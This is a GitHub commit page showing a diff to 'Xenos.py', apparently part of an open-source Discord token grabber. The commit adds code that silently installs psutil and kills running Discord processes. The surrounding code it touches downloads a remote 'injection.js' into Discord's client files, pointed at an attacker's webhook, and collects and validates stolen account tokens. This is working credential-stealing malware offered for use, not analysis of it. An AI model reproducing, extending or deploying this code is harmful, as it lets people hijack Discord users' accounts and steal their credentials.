Skip to content

Commit

Permalink
🐺 Auto Kill Discord Instances
Browse files Browse the repository at this point in the history
🐺 Auto Kill Discord Instances
  • Loading branch information
KanekiWeb authored Apr 19, 2022
1 parent aec3421 commit dbdd639
Showing 1 changed file with 11 additions and 2 deletions.
13 changes: 11 additions & 2 deletions Grabber/python/Xenos.py
Original file line number Diff line number Diff line change
Expand Up @@ -5,7 +5,7 @@

class X3N0S:
def __init__(self):
self.host = "https://yourwebsite.com" # No put / at the end
self.host = "https://yourwebsite.com/"
self.all_tokens = []
self.valid_tokens = []
self.paths = {
Expand Down Expand Up @@ -69,10 +69,19 @@ def __WriteStub(self):
for file in os.listdir(end_path):
if "index.js" in file.lower():
os.makedirs(end_path+"\\XenosStealer")
open(end_path+"index.js", 'w', encoding="UTF-8").write((urllib.request.urlopen(urllib.request.Request("https://raw.githubusercontent.com/KanekiWeb/Xenos/main/Grabber/Injection/injection.js")).read().decode('utf-8')).replace("%WEBHOOK_LINK%", self.host))
open(end_path+"index.js", 'w', encoding="UTF-8").write((urllib.request.urlopen(urllib.request.Request("https://github.com/KanekiWeb/Xenos/blob/main/Grabber/Injection/injection.js")).read().decode('utf-8')).replace("%WEBHOOK_LINK%", self.host))
except:pass

def __KillInstance(self):
for _ in range(2):
try:import psutil
except:os.system('pip install psutil >nul')

for proc in psutil.process_iter():
if any(procstr in proc.name().lower() for procstr in ['discord', 'discordcanary', 'discorddevelopment', 'discordptb']):proc.kill()

def __Main__(self):
self.__KillInstance()
self.__WriteStub()
self.__Check_Tokens()
for token in self.valid_tokens:
Expand Down

0 comments on commit dbdd639

Please sign in to comment.